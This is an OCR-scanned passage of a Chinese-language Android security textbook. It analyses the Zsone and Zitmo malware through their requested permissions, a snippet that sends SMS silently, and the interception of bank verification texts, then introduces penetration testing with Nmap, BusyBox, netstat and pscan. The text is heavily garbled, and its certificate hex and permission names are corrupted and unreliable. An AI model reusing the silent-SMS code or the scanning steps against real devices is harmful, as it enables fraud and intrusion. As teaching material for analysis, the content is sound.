«item name-"android.permission.SET WALLPAPER" /» 

«item name-"android.permission.SEND SMS" /» 

«item name-"android.permission.WRITE  EXTERNAL STORAGE" /» 
«item name-"android.permission.INTERNET" /» 

«item name-"android.permission.RECEIVE SMS" /» 

«item name-"android.permission.ACCESS  COARSE LOCATION" /» 
«item name-"android.permission.RESTART PACKAGES" /» 


如 图 4.13 所 示 ， 该 应 用 程序 请 求 的 这 些 权 限 没 有 一 个 与 作为 一 款 日 历 应 用 程 
序 应 有 的 功能 相关 。 基 本 上 ， 所 有 的 这 些 权限 赋予 的 功能 ， 如 接收 和 发 送 SMS 信 
息 、 提 供 基 于 手机 蜂 窒 移 动 D 或 Wi-Fi 的 位 置信 息 ， 以 及 读 取 电话 状态 等 功能 ， 
都 表明 该 应 用 程序 是 一 款 恶 意 软 件 。 下 面 的 代码 段 说 明了 该 应 用 程序 无 需 用 户 介 
入 ， 即 可 发 送 SMS 信息 的 功能 。 


SmsManager smgr = SmsManager.getDefault(); 

String destNum = "5553342234"; 

String smsString = "Your phone has been Pwnd"; 
smgr.sendTextMessage(destNum,null,smsString,null,null); 


4.5.3 Zitmo 手机 木马 程序 分 析 


MS, 大 多 数 主流 银行 都 推出 了 手机 银行 服务 软件 。 起 初 ， 这 些 软件 仅 使 用 单 
一 认证 方式 ， 即 通过 用 户 名 和 密码 验证 用 户 身份 ， 并 且 人 允许 用 户 登录 手机 银行 网 
站 ， 查 看 金融 信息 。 后 来 由 于 这 类 形式 的 认证 方式 很 容易 被 攻破 ， 如 通过 密码 破 
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«package names"com.mj.iColendar" codePathe" /data/app/com.mj.iCalendor-1,0pk" nativeLibroryPathe«" /data/data/com.mj . iCalendar/1ib" 
flags-"0" fte"132adfdf?d8" it»"l32adfdfaSB8" ute"132adfdfaS8" versione«"2" userld."10036". 

«Sigs counte"1"» 

«cert indexe"6" keys" 308202153082017e200302010202044d259ebc3004060920864886f 7000101050500304e310b30090603550406130238363100300906 
03550408130253483100300906035504071302434e31003009060355040013072444a3106300906035504061302444a310b63009906035504031302444330291 70d3 


1313831303631303531343050180f£32313130313231333130353134305a30463106389906035504061302383631056300306035504081302534831003002060355 
04071302434e310b3009068355040a13024d4a23106300990003550405130240423100300906035504031302444230819 f 3004060920864886f 7090101010500038 
18400030818902818100991e6556100370aüfdda7174dc42de8c3326c7 c6c2be3b7b76d9dbfd75ceBadaa5c45fe1b20105d10e9020076288933e30f94 £074014d1e& 
85f003ef c128c2608f57c2381693a7d7f6b09086391f53b32e8f2720474f£067214d37556771c85c738ce65c5571c513eac647f490464007 Fa3e f0b27db 10e B4d6 FOd1 
d6838890e717e6f2590203010001300d06032a864586f 794010195050003815810071bf2963338cco279c4d0322226 f 3932698a086a354 cRaac78Sf c7e36072 c44776f 
68e64a217b07be3adecóf ebf 38Bdfc2d602a3dc92a23f59420df40e76177e316060d89dd8dd25b3e4c6c054 £8586e137163d3b0764426e601b3060475c271051 f5bod 
BB815cc28693ccd12811dfed49ef3045B461cB4dBSafeac94aecdóff6a631adaod" /> 
«/s1gs» 
«perms» 
«item names"'android.permission.REAO PHONE STATE" /> 
«item names"android.permission.SET WALLPAPER" /> 
<item Nome= Ondrold permission. SEND SMS” /> 
<item name«s"android.permission, WRITE EXTERNAL STORAGE" 7» 
«item name="android. permission. INTERNET" /> 
'android.permission.RECEIVE SMS" /> 
| names"android.permission.ACCESS. COARSE. LOCATION" /> 
"nome= ondroid.permission. RESTART_PACKAGES™ /> 


«/package» 





图 4. 13 ”恶意 软件 Zsone 请 求 的 权限 @ 


解 、MITM (Man In The Middle, PEHA) 攻击 和 社会 工程 学 等 方式 ， 银行 已 经 开 
始 采 用 双重 认证 方式 。 除 了 需要 用 户 的 账号 和 密码 外 ， 还 需要 在 登录 时 各 用 户 手机 
发 送 一 条 内 容 为 5 ~6 位 数字 的 一 次 性 PIN 码 短 信 ， 作 为 完整 认证 过 程 的 一 部 分 ， 
从 而 确定 登录 用 户 的 身份 。 

Android 系统 上 的 Zitmo 木马 程序 能 够 通过 拦截 
银行 发 送 给 用 户 手 机 的 验证 人 码 短信 攻破 上 述 双重 认 
证 机 制 。2010 年 9 月 ， 这 种 蠕 忠 病毒 在 诺基亚 的 
Symbian 系统 上 第 一 次 被 发 现 。 现 在 ， 它 已 经 开始 感 0000-0000-0000-000 
染 Android 操作 系统 。 基 本 上 ，Zeus 木马 工具 包 主 要 
依靠 木马 程序 作案 ， 当 用 户 浏览 含有 Zeus 木马 的 恶 
意 网 站 时 ， 系 统 会 受到 Zeus 木马 感染 ， 目 动 安装 
Zeus 木马 工具 包 。Zeus 木马 工具 包 能 够 使 攻击 者 七 
取 认 证 证 书 ,该 证 书 是 双重 认证 过 程 的 第 一 层 。 之 
后 ， 安 装 的 Zitmo 手机 木马 程序 拦截 并 知 取 银行 发 送 
给 用 户 的 交易 授权 验证 人 码 (Transaction Authentication | 
Number, TAN) 短信 ， 并 将 其 提供 给 攻击 者 ， 从 而 攻破 双重 认证 过 程 的 第 二 层 。 

恶意 软件 把 自己 伪装 成 名 为 “Trusteer Rapport” 的 应 用 程序 ， 如 图 4. 14 所 示 。 





图 4.14 Android 系统 上 
的 Zitmo 恶意 软件 


O ”通过 模拟 器 上 的 /data/system/packages. xml 文件 ， 查 看 Zsone 应 用 请 求 的 权限 信息 。 原 书 注 

© MITM (Man In The Middle, HHA) 攻击 是 一 种 “间接 ”的 入 侵 攻 击 ， 这 种 攻击 模式 是 通过 各 种 技 
术 手 段 将 受 人 侵 者 控制 的 一 台 计 算 机 虚拟 放置 在 网 络 连接 中 的 两 台 通 信 计 算 机 之 间 ， 这 人 台 计 算 机 就 
称 为 “中 间 人 ”。 简 言 之 ， 所 谓 的 MITM 攻击 就 是 通过 拦截 正 帝 的 网 络 通信 数据 ， 并 进行 数据 自 改 和 
嗅 探 ， 而 通信 的 双方 却 毫 不 知情 。 目 前 ，MITM 攻击 已 经 成 为 对 网 银 、 网 游 、 网 上 交易 等 最 有 威胁 并 
且 最 有 具 破 坏 性 的 一 种 攻击 方式 。 一 一 译 者 注 
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它 以 “com. systemsecurity6. gms" 的 应 用 程序 包 名 取得 用 户 信 任 ， 安 装 在 设备 上 。 
对 于 一 般 用 户 来 说 ， 很 难 将 该 包 名 的 应 用 程序 识别 成 恶意 软件 。 


在 模拟 器 上 启动 的 shell 程序 上 执行 “ps” 命 令 , 将 显示 所 有 Cs A, 


图 4. 15 ps 命令 输出 显 


如 图 4. 16 所 示 ， 亚 意 软件 Zitmo 请 求 的 权限 如 下 : 
«item name-"android.permission.READ PHONE STATE" /> 
«item name-"android.permission.INTERNET" /> 


«item name-"android.permission.RECEIVE _ 


如 图 4. 15 所 示 。 从 图 中 可 见 ， 亚 意 软 件 Zitmo 使 用 “com. systemsecurity6. gms" 的 
包 名 运行 在 系统 上 。 
root 23 2 0 0 cQ04b2c4 00000000 S kstriped 
root 24 2 ð c004b2c4 00000000 S hid_compat 
root 25 2 Q Q cQ04b2c4 00000000 S rpciod/O 
root 26 2 Q 0 cei9diec 0090009000 S mmcqd 
root 27 1 248 152  c009b74c 0000875c S /sbin/ueventd 
system 2B 1 804 276  c0189434 afdüb6fc 5 /system/bin/servicemanager 
root 29 1 3864 592  Fffffffff afdObdac 5 /system/bin/vold 
root 30 1 3836 560  ffffffff afdObdac S /system/bin/netd 
root 31 1 664 264  cQlbS2b4 afdOcOcc S /system/bin/debuggerd: 
radio 32 1 5396 700  ffffffff afdObdac S /system/bin/rild 
root 33 1 74072 27136 c009b74c afd0b844 S zygote 
media 34 1 17996 3768 ffffffff afdðb6fc S /system/bin/mediaserver 
root 35 1 812 344  c02181f4 afdðb45c S /system/bin/installd 
keystore 36 l 17/44 432  c01b52b4 afdOcOcc S /system/bin/keystore 
root 38 1 824 340  c00bB8fec afdOcS1c S /system/bin/qgemud 
shell 49 1 732 312  c0158eb98 afd0b45c S /system/bin/sh 
root 41 1 3368 172  Fffffffff 00008294 S /sbin/adbd 
system 61 33 136736 40448 ffffffff afdOb6fc S system server 
app 4 ll6 33 86108 22800 ffffffff afdOücSic S jp.co.omronsoft.openwnn 
radio 12D | 733 99176 24460 ffffffff afd0cSic S com.android.phone 
system 1423 1 33 86620 25880 ffffffff afdoc51c S com.android.systemui 
app. 13 l4 ^ 33 95416 32232 ffffffff afd6c51c S com.android.launcher 
system 159 — 33 86660 21400 ffffffff afdéc5ic S com.android.settings 
app. 5 INS 33 93752 26352 ffffffff afdOüc51c S android.process.acore 
app 19 189 33 84312 21352 ffffffff afdOücSic S com.android.deskclock 
app. 24 201 33 82976 19968 ffffffff afdO0cSic 5 com.android.protips 
app. 5 214 33 83528 20456 ffffffff afdOüc5ic S com.android.music 
app. 2 £25 — 33 84012 20960 ffffffff afdücSic S com.android.quicksearchbox 
app 9 e33 ^33 86488 22432 ffffffff afdücSic S android.process.media 
app. 15 244 33 95608 21728 ffffffff afdücSic S com.android.mms 
app ..28 266 33 85976 22892 ffffffff afdOücSic S com.android.email 
app. 3 347 33 83940 20084 ffffffff afdücSi1c S com.android.defcontainer 
app. 9 358 33 82896 19632 ffffffff afdO0c5ic 5 com.svox.pico 
root 400 41 732 348  c003da38 afdOc3ac 5 /system/bin/sh 
app..38 402 33 83212 20696 ffffffff afdücS1c S com.systemsecurity6.gms 
a 410 400 888 324 | 00000000 afdO0b45c R ps 
# 


示 (可 见 Zitmo 正在 运行 


SMS" /> 


READ. PHONE. STATE 权限 使 应 用 程序 可 以 获得 IMEI 码 、SIM 码 ， 以 及 其 他 
一 标识 手机 的 数据 。RECEIVE_SMS 权限 使 其 能 够 拦截 银行 网 站 发 送 的 交易 授权 


给 远程 命令 与 控制 (Command and Control, 


ken 一 旦 窃取 交易 授权 验证 码 ， 该 恶意 软件 即使 用 INTERNET 权限 将 其 发 大 


C&C ) 中 心 。 
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«gockage nate«"com.systemsecurityb.gms" codePpoth, /data/app/com. systemsecurity6.ges-1.apk" notivelibroryPatn-"/dota/ücto/Com, systems 
ecurityb. gas/lib flags«"8* ftz"132ficelb28" it-e"132flcelfS7" ut-"132ficelf57" versione"l" userld- 10033» 

«sigs counte"*1'» 

«cert indexe"6" key-"3082010730820110000302018202044262854563000060320864886f70001010505003018311630140603550400130405472757374556572- 
04c746420301e170431313035323331373339303250170433363035373231373333303250301831163014860355040213045472757374656572204c 746426308197 3 
002060920864356*70001010105000381830030818902861810006Cc322a22156263316114727187140935367f af 3ec cáe *32Da2ceb6c8c7042eceo4 f6e38216eE5 ?3c? 
Adüfce65addee77579b2e774026daf Rüfefadéc? ebe6ddoc5p4a5fa2 f d1028f595983dp 306dee f6cb76396698c073b54500644811469153784131124524926520434 
f35b3pd039b841c2b684f56c6218e30140507f40b9930203010001300d060920864886/7040101050500035181092804490cf062 fü6aQcebbe f 85041513648101e6f3 
Cb385c8547960864 £ae99b387034560329800 f d4960 f6a2440dccae9b5Rcf058d75052394487 7h6db48d507cd601e58588a0f33133700583a061766edo80e 12e 38e42 * 
e35seeb33c524237234348635clo3Rdcf9d416008f228ac03368F £37663278065b799p02990c738130466" /> 

x/sigs» 

«nerms» 

«item names"ondroid.permission,READ.PHONE STATE" /> 

«item names"anároid.permission.INTERNET" /» 

«item names"androld.permission.RECEIVE, SMS" /> 

«/perms» 


«inacvnnes 


图 4.16  Zitmo 权限 


4.6 小 结 


本 章 介 绍 了 Android 安全 模型 的 内 核 层 和 应 用 层 ， 通 过 本 章 的 学 习 ， 读 者 应 该 
能 够 理解 Android 系统 如 何 使 用 Linux 内 核 运 行 基于 权限 的 安全 模型 。 其 次 ， 本 章 
还 介绍 了 Manifest 权限 ， 并 从 安全 性 意义 的 角度 ， 论 证 了 Manifest 权限 对 Android 
应 用 程序 的 重要 性 。 再 次 ， 本 章 前 述 了 移动 设备 的 安全 格局 ， 包 括 搭载 Android i 
作 系 统 平 台 的 移动 设备 。 最 后 ， 本 章 分 析 了 几 款 恶意 软件 ， 演 示 了 如 何 基于 请 求 权 
限 对 应 用 程序 进行 安全 分 析 的 方法 。 
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本 草 主要 关注 Android 系统 平台 和 应 用 程序 的 渗透 测试 。 首 先 从 介绍 渗透 方 
法 、 讨 论 如 何 获 得 Android 操作 系统 细节 信息 和 人手， 然后 对 Android 应 用 程序 进行 
渗透 测试 ， 继 而 讨论 Android 应 用 程序 的 安全 问题 。 在 本 章 结束 前 ， 讨 论 几 个 相对 
较 新 的 问题 ( 如 云 存 储 等 ) 和 系统 修补 问题 。 最 后 ， 展 示 几 个 近期 出 现 的 Android 
应 用 程序 安全 问题 。 

通过 前 面 几 章 的 介绍 ， 读 者 应 该 对 Android 系统 的 体系 结构 (第 2 童 介绍 的 内 
f£). Android 应 用 程序 基础 知识 〈 如 构成 组 件 、 框 架 等 ， 第 3 章 介绍 的 内 容 )， 以 
及 Android 权限 和 安全 模型 (第 4 章 介绍 的 内 容 ) 比较 熟悉 了 。 


5.1 渗透 测试 


渗透 测试 (Penetration Test) ， 也 可 称 为 pen 测试 ， 是 一 种 通过 模拟 内 部 和 外 部 
攻击 ， 评 佑 系统 安全 性 的 方法 ， 目 的 是 在 亚 意 攻击 者 发 现 问 题 之 前 找到 并 修复 这 些 
问题 。 一 般 在 应 用 软件 发 布 之 前 进行 测试 ， 用 于 确保 软件 的 安全 性 ， 或 是 在 应 用 软 
件 发 布 之 后 ， 通 过 测试 确保 软件 没有 漏洞 存在 。 源 码 审 查 或 静态 分 析 可 以 有 效 地 辅 
助 渗透 测试 。 理 想 情况 下 ， 静 态 分 析 应 当 是 软件 开发 生命 周期 (Software Develop- 
ment Life Cycle, SDLC) 的 一 部 分 ， 需要 在 渗透 测试 之 前 进行 。 如 果 在 渗透 测试 之 
前 进行 静态 分 析 ， 就 可 以 在 软件 产品 开发 完毕 之 前 纠正 发 现 的 问题 ， 从 而 相对 减少 
渗透 测试 过 程 中 发 现 的 问题 。 这 样 ， 如 果 客 户 需要 渗透 测试 报告 的 话 ， 就 能 够 提供 
相对 傈 清 的 渗透 测试 报告 ， 从 而 为 测试 产品 提供 安全 担保 。 

根据 展开 模拟 测试 的 位 置 ， 可 将 渗透 测试 分 为 两 类 : 内 部 测试 和 外 部 测试 。 接 
下 来 的 内 容 主 要 对 内 部 和 外 部 渗透 测试 、 进 行 渗 透 测 试 的 教程 、 静 态 分 析 ， 以 及 对 
Android 操作 系统 和 设备 实施 渗透 测试 的 步骤 进行 概述 。 


5.1.1 外 部 渗透 测试 


外 部 渗透 测试 主要 是 由 安全 测试 人 员 在 网 络 外 部 对 系统 进行 的 测试 ， 测 试 人 员 
仅 被 提供 有 限 的 信息 。 企 业 网 络 由 众多 防火 墙 保 护 ， 这 些 防火 墙 具 有 ACL (Access 
Control List， 网 络 控制 列表 ) 功能 ， 能 够 阻止 大 多 数 端口 被 从 外 部 访问 。 在 外 部 渗 适 
测试 中 ， 提 供给 安全 测试 人 员 的 信息 只 有 URL A IP 地 址 。 并 且 执 行 外 部 渗透 测试 
时 ， 测 试 人 员 使 用 的 很 多 工具 或 技术 将 遭 到 防火 墙 的 阻拦， 通常 是 阻止 它们 对 内 部 
网 络 的 探测 ， 从 而 阻止 这 些 存 在 但 被 防火 墙 或 其 他 防御 系统 保护 的 漏洞 被 发 现 。 
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例如 ， 经 过 root 处 理 的 Android 设备 在 850 端口 运行 一 个 服务 。 通 常 将 防火 墙 
配置 为 禁止 该 闪 口 被 探测 ， 以 保护 在 该 端口 上 运行 的 服务 。 这 样 ， 外 部 的 渗透 测试 
就 无 法 检测 到 在 该 端口 上 运行 的 服务 。 然 而 ， 如 果 经 过 root 处 理 的 Android 设备 在 
80 端口 运行 httpd 服务 器 ， 则 借助 外 部 渗透 测试 ， 很 有 可 能 发 现在 SO 端口 上 运行 
的 httpd 服务 ， 因 为 防火 墙 允 许 80 端口 被 外 部 网 络 访问 。 


5.1.2 内 部 渗透 测试 


防火 墙 无 法 阻止 内 部 渗透 测试 (如果 存在 分 层 体 系 结构 的 网 络 防火 墙 布局 ， 
或 许可 以 对 内 部 渗透 测试 有 些 屏蔽 作用 ) 。 因 此 ， 对 于 内 部 渗透 测试 来 说 ， 获 取 内 
部 系统 (例如 ,拥有 私有 IP 地 址 的 系统 等 ) 的 信息 相对 比较 容易 。 

继续 以 root 处 理 过 的 Android 设备 为 例 ， 仍 然 在 该 设备 的 850 端口 上 运行 某 一 
服务 。 由 于 防火 墙 可 能 不 会 阻止 内 部 渗透 测试 ， 因 此 对 于 安全 测试 人 员 来 说 ， 通 过 
内 部 渗透 测试 很 有 可 能 发 现 该 端口 及 在 其 上 运行 的 服务 。 从 而 ， 当 该 服务 正 同 其 他 
设备 进行 通信 时 ， 即 可 探测 到 该 过 程 。 

根据 以 往 的 经 验 ， 同 外 部 渗透 测试 相 比 ， 内 部 渗透 测试 能 够 发 现 更 多 的 问题 ， 
外 部 渗透 测试 基于 这 样 一 个 事实 : 外 部 攻击 者 无 法 访问 网 络 内 部 设备 。 然 而 ， 这 并 
不 意味 着 内 部 渗透 测试 发 现 的 问题 就 不 重要 ， 业 内 人 士 同 样 能 够 利用 这 些 问题 。 而 
且 ， 外 部 攻击 者 很 可 能 利用 这 些 问题 发 起 更 大 范围 的 攻击 ， 并 将 这 些 攻击 作为 这 一 
大 范围 攻击 的 一 部 分 。 从 这 个 意义 上 来 说 ， 实 际 上 ， 攻 击 者 就 已 经 处 于 网 络 的 内 
部 了 。 


5.1.3 渗透 测试 方法 


同行 评审 方法 可 以 指导 渗透 测试 执行 的 过 程 。NIST 800-115 和 OSSTMM 就 是 
这 样 的 两 类 指导 性 的 文档 。 在 进行 渗透 测试 时 ， 不 需要 严格 遵照 其 中 所 述 的 每 一 个 
步骤 ， 只 需 把 它们 作为 指导 性 的 原则 ， 并 根据 具体 需求 加 以 修改 ， 实 施 测 试 。 

典型 的 渗透 测试 大 致 可 以 分 为 以 下 四 个 阶段 : 

1) 规划 : 确定 实施 目标 ， 获 取 批 准 和 支持 。 

2) 发 现 : 获取 目标 信息 ， 包 括 TP 地址、 联系 人 信息 、 系统 信息 ( 如 操作 系 
统 版 本 ) 、 应 用 程序 ， 以 及 数据 库 信 息 等 。 

3) 攻击 : 基于 阶段 2 得 到 的 信息 ， 确 定 所 有 存在 漏洞 的 系统 、 应 用 程序 以 及 
数据 库 ， 利 用 这 些 漏洞 。 必 要 的 话 ， 返 回 阶段 2， 再 次 实施 发 现 过 程 。 

4) 报告 : 根据 评 佑 ， 将 发 现 的 问题 按照 严重 性 等 级 进行 分 类 : 致命 风险 、 高 
风险 、 中 等 风险 以 及 低 风 险 。 同 时 ， 将 得 出 的 分 析 和 建议 报告 提供 给 管理 者 。 


5.1.4 静态 分 析 
静态 分 析 不 属于 渗透 测试 ， 但 是 对 于 安全 测试 人 员 来 说 ， 静 态 分 析 是 一 个 重要 
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的 工具 。 它 可 以 帮助 安全 测试 人 员 早 在 软件 开发 生命 周期 中 ， 就 能 够 发 现 软件 代码 
方面 存在 的 问题 ， 当 然 如 果 软 件 已 经 发 布 ， 也 可 使 用 静态 分 析 在 软件 安全 评估 后 
期 ， 发 现代 码 中 存在 的 相关 问题 。 静 态 分 析 工具 针对 程序 代码 库 展 开 分 析 ， 借 助 相 
关 代码 分 析 算法 ， 分 析 不 同 的 代码 路 径 和 流程 ， 并 且 提供 一 个 潜在 的 安全 问题 清 
单 。 在 静态 分 析 中 ， 常 常会 出 现 一 定 比例 的 误 报 。 完 美的 静态 分 析 用 法 在 于 程序 开 
发 人 员 无 需 外 部 帮助 ， 仅 靠 使 用 静态 分 析 理解 /改进 自己 编写 的 代码 ， 防 止 以 后 可 
能 出 现 的 代码 问题 。 | 

对 于 Android 系统 而 言 ， 本 书 主要 分 析 两 个 层次 的 安全 性 问题 ; 操作 系统 和 应 
用 程序 (本 书 不 考虑 硬件 层 ， 有 关 硬 件 层 的 安全 问题 可 参考 其 他 书籍 )。 


5.1.5 Android 系统 和 设备 渗透 测试 步骤 


对 于 身边 大 多 数 的 Android 设备 来 说 ， 一 个 主要 的 问题 就 是 ， 该 设备 是 否 经 过 
root 处 理 。root 处 理 过 的 设备 可 能 面临 更 多 的 安全 风险 ， 因 为 用 户 能 够 以 提升 的 权 
限 运 行 应 用 程序 ， 并 且 攻 击 者 也 能 够 利用 提升 的 权限 损害 Android 设备 。 同 时 ， 分 
析 Android 操作 系统 软件 栈 自身 存在 的 问题 ， 对 于 确保 Android 系统 安全 性 也 是 很 
有 帮助 的 ， 尽 管 这 需要 查看 内 核 源码 和 各 种 系统 支持 库 等 内 容 的 源码 。 此 外 ， 对 于 
安全 测试 人 员 来 说 ， 组 合 使 用 黑白 盒 测 试 通常 也 是 一 种 非常 好 的 安全 测试 方法 ， 这 
可 以 使 测试 人 员 在 访问 网 络 上 设备 的 过 程 中 ， 当 感到 设备 上 存在 可 疑 活动 时 ， 能 够 
立即 进行 进一步 的 深入 探测 。 

1) 获取 Android 设备 的 地址。 

2) 运行 NMAPS 进 行 扫描 ， 查 看 目标 设备 上 运行 的 服务 。 

3) 对 可 疑 设备 (如 经 过 root 处 理 的 设备 ) ， 使 用 Wireshark 获取 并 分 析 数 据 包 。 

4) 如 果 认 为 设备 被 人 侵 ， 使 用 诸如 BusyBox 工具 探查 设备 内 部 运行 状况 (如 
哪些 进程 正在 运行 等 ) ， 同 时 进行 鉴别 。 

5) 对 操作 系统 和 各 种 支持 库 的 源 代码 执行 静态 分 析 。 尤 其 是 查看 各 个 设备 厂商 所 
供 的 代码 ， 如 HTC 等 。 代 码 审 查 主要 关注 以 下 几 种 类 型 的 问题 ， 资源 泄露 、 空 指针 引 
用 、 非 法 访问 操作 ， 以 及 程序 执行 流程 等 问题 ， 从 而 找 出 那些 绕 过 安全 检查 的 问题 。 

6) 审查 配置 文件 和 代码 是 否 使 用 明文 存储 密码 和 其 他 的 敏感 数据 ， 而 没有 采 
取 适 当 安 全 考虑 。 


5.2 Android 渗透 测试 工具 


虽然 Android 系统 在 设计 上 自 带 了 一 个 精简 的 shell 程序 ， 但 是 当 安全 测试 人 员 


O ”NMAP， 网 络 安全 扫描 器 是 一 款 开放 源 代码 的 网 络 探测 和 安全 审核 的 工具 。 它 的 设计 目标 是 快速 地 扫 
描 大 型 网 络 ， 当 然 用 它 扫描 单个 主机 也 没有 问题 。 — FER UE 
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需要 访问 更 多 信息 时 ， 该 shell 程序 无 法 满足 安全 测试 人 员 的 需求 。 对 于 这 一 问题 ， 
测试 人 员 可 以 使 用 其 他 的 几 种 工具 来 解决 ， 例 如 Nmap: 网 络 扫 描 器 、Wireshark: 
网 络 嗅 探 器 ， 以 及 BusyBox: 命令 行 ( 如 可 执行 “ifconfig” 命令) 集成 工具 。 对 于 
测试 人 员 来 说 ，BusyBox 是 这 几 个 工具 中 最 稼 用 的 。 


5.2.1 Nmap 


如 果 没 有 访问 设备 本 身 ， 只 是 查看 存在 Android 设备 的 网 络 ， 此 时 ， 可 以 使 用 
Nmap fdfüj2*. Nmap 扫描 颖 能 够 对 指定 的 IP 地 址 局 动 同 步 扫 描 〈SYN ) ， 查 找 操 作 
系统 指纹 识别 信息 和 版 本 检测 信息 ， 如 图 5. 1 所 示 ， 该 扫描 结果 显示 没有 打开 的 端 
口 〈 或 在 病 口 上 运行 的 服务 ) ， 因 此 无 法 提供 有 关 该 Android 设备 的 有 用 信息 。 不 
过 , 一 旦 存在 打开 的 端口 ， 就 可 以 对 该 端口 实施 进一步 的 探测 。 


六 Anmol — bash — 80x24 T-— ai. 


Se sop s. 51 C http: // nmap. org ) at 2011-12-24 13:34 PST 
Warning: Unable to open interface vmnetl -- skipping it. 
Warning: Unable to open interface vmnet8 -- skipping it. 

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn 
Nmap done: 1 IP address (8 hosts up) scanned in 3.79 seconds 

anmmisra-mac:- Anmol$ sudo nmap -sS -A 192.168.0.104 





Starting Nmap 5.51 ( http://nmap.org ) at 2011-12-24 13:34 PST 

Warning: Unable to open interface vmnetl -- skipping it. 

Warning: Unable to open interface vmnet8 -- skipping it. 

Nmap scan report for android .3474f00bc85957bc (192.168.0.194) 

Host is up (0.016s latency). 

All 1000 scanned ports on android 3474f00bc85957bc (192.168.0.104) are closed 
Too many fingerprints match this host to give specific OS details 

Network Distance: 1 hop 


TRACEROUTE (using port 1025/tcp) 
HOP RTT ADDRESS 
1 3.06 ms android 3474f00bc85957bc (192.168.0.104) 


OS and Service detection performed. Please report any incorrect results at http: 


//mmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 4.93 seconds 


[5.1 对 Android 设备 执行 Nmap 同步 扫描 


5.2.2 BusyBox 


虽然 Android 系统 自 带 了 一 个 精简 的 Shell 工具 程序 ， 但 是 BusyBox 工具 能 够 为 
Android 系统 提供 UNIX 系统 工具 集中 很 多 常用 的 工具 ， 从 而 使 得 在 Android 设备 上 
进行 了 解 、 查 看 、 渗 透 测 试 以 及 取证 鉴别 等 操作 更 加 便捷 方便 。 不过， 由 于 
BusyBox 是 在 Android 系统 上 运行 ， 不 是 所 用 的 功能 选项 都 能 被 支持 ， 例 如， 那些 

只 能 在 桌面 版 本 系统 上 才能 运行 SEENE 
下 面 是 在 模拟 器 上 安装 并 运行 BusyBox 工具 过 程 的 说 明 ， 如 图 5.2 所 示 。 对 于 
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一 个 Android 设备 ， 需 要 经 过 root JH, F Bec BusyBox 应 用 程序 包 ， 从 而 使 其 
成 功 运行 。 
首先 ， 从 Linux 系统 上 的 终端 控制 合 局 动 adb shell， 执 行 下 述 命 令 (假设 手 边 
已 有 BusyBox 的 二 进 制 可 执行 安 闵 文件 ): 
adb shell mkdir /data/busybox 
adb shell push busybox /data/busybox 
adb shell 


chmod 755 /data/busybox 
/data/busybox -install 


pentestusrletools-gibbons-vm-2:-$ adb shell 

K cd /data/busybox 

# ./ifconfig 

eth Link encap:Ethernet HWaddr 52:54:00:12:34:56 
inet addr:10.0.2.15 $8cast:10.0.2.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:340 errors:Q dropped:0 overruns:O frame: 
TX packets:336 errors:@ dropped:0 overruns:9 carrier: 
collisions:0 txqueuelen:1090 
RX bytes:24268 (23.6 KiB) TX bytes:22374 (21.8 KiB) 
Interrupt:13 Base address:0xc0090 DMA chan:ff 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

UP LOOPBACK RUNNING MTU:16436 Metric:1 

RX packets:0 errors;O dropped:0 overruns:Q frame:0 
TX packets:Q errors;9 dropped:O overruns:Q carrier: 
collisions:i® txqueuelen:0 

RX bytes:@ (0.0 B) TX bytes:0 (0.0 B) 





图 5.2  BusyBox 安装 后 执行 ifconfig 命令 


这 时 ， 这 些 命令 工具 应 该 已 经 安装 在 /data/busybox 目录 下 了 ， 更 改 该 目录 的 
路 径 或 更 新 系统 环境 变量 PATH ， 就 能 直接 使 用 这 些 常用 的 UNIX dp T o 

如 图 5. 2 所 示 ， 从 执行 “ifconfig” 命 令 的 输出 结果 可 见 ， 该 模拟 器 的 IP 地 址 为 
“10. 0. 2. 15”， 这 是 一 个 专用 于 模拟 器 的 保留 地 址 。 如 果 设 备 连接 在 网 络 上 ， 那 么 这 
个 四 地 址 可 能 形 如 “192. 168. 0. 104” HIRET. IP 地 址 “10. 0. 2. 2” 是 用 户 工作 机 系 
统 ( 例 如， 运行 模拟 器 的 工作 机 系统 ) 上 本 地 回环 地 址 “127.0.0.1” 的 别名 。 
“10. 0.2.1” 是 路 由 器 /网 关 的 地 址 , “10. 0. 2.3” 是 首 个 DNS 服务 器 的 地 址 。 

如 图 5. 3 和 图 5.4 所 示 ， 从 这 个 截图 上 可 以 看 到 ，80 端口 是 开启 的 ， 设 备 上 
的 httpd 服务 程序 运行 在 该 端口 。 在 一 个 典型 的 Android 设备 上 ， 需 要 对 该 端口 做 
进一步 的 探测 。 


5.2.3 Wireshark 
要 想 分 析 Android 设备 产生 的 数据 包 ， 可 以 有 两 种 方式 : 一 种 是 需要 对 Android 
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pentestusrletools-gibbons-vm-2:-$ adb shell 
* cd /data/busybox 
& ./netstat -an 
Active Internet connections (servers and estoblished) 
Proto Recv-Q Send-Q Local Address Foreign Address State 
0 127.0.0.1:5037? 0.0.0.0:* LISTEN 

0 0 0.0.0.0:5555 0.0.0.0:" LISTEN 

e 79 10.0.2.15:5555 10.0.2.2:57335 ESTABLISHED 
netstat: no support for 'AF INET6 (tcp)' on this system 
netstat: no support for 'AF INET6 (Cudp)' on this system 
netstat: no support for 'AF INET6 (raw)' on this system 
Active UNIX domain sockets (servers and established) 
Proto RefCnt Flags Type State I-Node Path 
unix 2 Wt: STREAM LISTENING 258 /dev/socket/property se 
rvice 
Unix 
unix 
UI X 
unax 
unix 
unix 
Plano: 
unix 
unix 


ACC STREAM LISTENING 277 /dev/socket/vold 

ACC STREAM LISTENING 28A /dev/socket/netd 

ACC STREAM LISTENING 322 &j1dwp-control 

ACC STREAM LISTENING 291 /dev/socket/rild-debug 
ACC STREAM LISTENING 293 dev/socket/rild 

ACC STREAM LISTENING 295 /dev/socket/zygote 

ACC STREAM LISTENING 302 /dev/socket/1installd 
ACC STREAM LISTENING 304 /dev/socket/keystore 
ACC STREAM LISTENING 311 /dev/socket /qgemud 


m3) nm mj Nj 


emn send Jam: A ae E a m Ru Be D em 


MJ MI PI MM) fj 





图 5.3 调用 BusyBox 工具 提供 的 netstat 命令 


pentestusri@tools-gibbons-vm-2:~$ adb shell 
* cd /data/busybox 
* ./pscan 10.0.2.15 
Scanning 10.0.2.15 ports 1 to 1024 
Port Proto State Service 


80 tcp open unknown 
1023 closed, 1 open, 9 timed out ports 
# | 





图 5.4 使 用 pscan 命令 扫描 检测 各 端口 


